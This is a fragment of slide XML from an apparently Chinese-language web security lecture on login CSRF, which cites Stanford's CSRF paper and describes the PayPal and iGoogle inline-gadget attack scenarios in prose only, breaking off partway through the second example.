              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>seclab.stanford.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>websec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>csrf.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD32EC7-BD4D-424F-8461-977C0C5CC494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2224908" y="4004846"/>
            <a:ext cx="2118491" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg"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Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1024532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1" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7170" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1471613"/>
          <a:ext cx="7924800" cy="5119687"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Acrobat Document" r:id="rId2" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId2" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">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71613"/>
                        <a:ext cx="7924800" cy="5119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Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="5334000"/>
            <a:ext cx="2667000" cy="8382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pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4381500" y="4152900"/>
            <a:ext cx="2057400" cy="3048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en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>举例一</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97283" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="165435" y="1752600"/>
            <a:ext cx="4406565" cy="3019424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A271AE-357D-476A-9EE5-47F8A2BC5318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4693939" y="1752600"/>
            <a:ext cx="4394607" cy="3019424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762751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2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en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99331" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2128837"/>
            <a:ext cx="3794930" cy="2600325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280CAC0B-CB41-4BE6-8E34-C0645ED8D716}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="1219200"/>
            <a:ext cx="4413856" cy="4724400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="640322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000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="8077200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>允许其用户相互转移资金。要为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>帐户提供资金，用户可以注册其信用卡或其银行帐户。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者可以使用登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来挂载以下攻击：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>访问恶意商家的网站并选择使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>付款</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t> 像往常一样，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>被重定向到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>并登录到他的帐户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t> 商家默默地将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>登录到他自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>帐户。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>登记他的信用卡，但信用卡实际上已被添加到商家的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>PayPal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>帐户。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14322943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609600" y="381000"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>CSRF--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>举例二</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1485900" y="1722438"/>
          <a:ext cx="6172200" cy="4830762"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Image" r:id="rId2" imgW="11276190" imgH="8825397" progId="Photoshop.Image.8">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId2" imgW="11276190" imgH="8825397" progId="Photoshop.Image.8">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900" y="1722438"/>
                        <a:ext cx="6172200" cy="4830762"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5393BB67-1328-41AA-A234-A6AF4E8E87A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="3733800"/>
            <a:ext cx="1219200" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Inline Gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1728368560"/>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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" dirty="0">
                <a:ea typeface="굴림" charset="0"/>
              </a:rPr>
              <a:t>Using Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:ea typeface="굴림" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" dirty="0">
                <a:ea typeface="굴림" charset="0"/>
              </a:rPr>
              <a:t>SRF for XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83971" name="Picture 10" descr="login-csrf-xss"/>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521736" y="1447800"/>
            <a:ext cx="8100528" cy="5334000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1826578598"/>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sz="4000" dirty="0">
                <a:ea typeface="굴림" charset="0"/>
              </a:rPr>
              <a:t>Using Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
                <a:ea typeface="굴림" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" dirty="0">
                <a:ea typeface="굴림" charset="0"/>
              </a:rPr>
              <a:t>SRF for XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1397000"/>
            <a:ext cx="8458200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>iGoogle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，用户可以通过添加小工具（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> gadgets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>）来自定义其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>主页。 为了可用性，一些小工具是“内联的”（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>），这意味着它们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>iGoogle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的安全环境中运行。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在添加此类小工具之前，系统会要求用户做出信任决策，但在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>攻击时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会代表用户做出信任决策</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>1. attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>使用自己的浏览器编写内联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>iGoogle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>小工具（包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）并将其添加到自己的个性化主页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>2. attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>使得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，并向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>iGoogle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>打开一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>frame</a:t>
            </a:r>
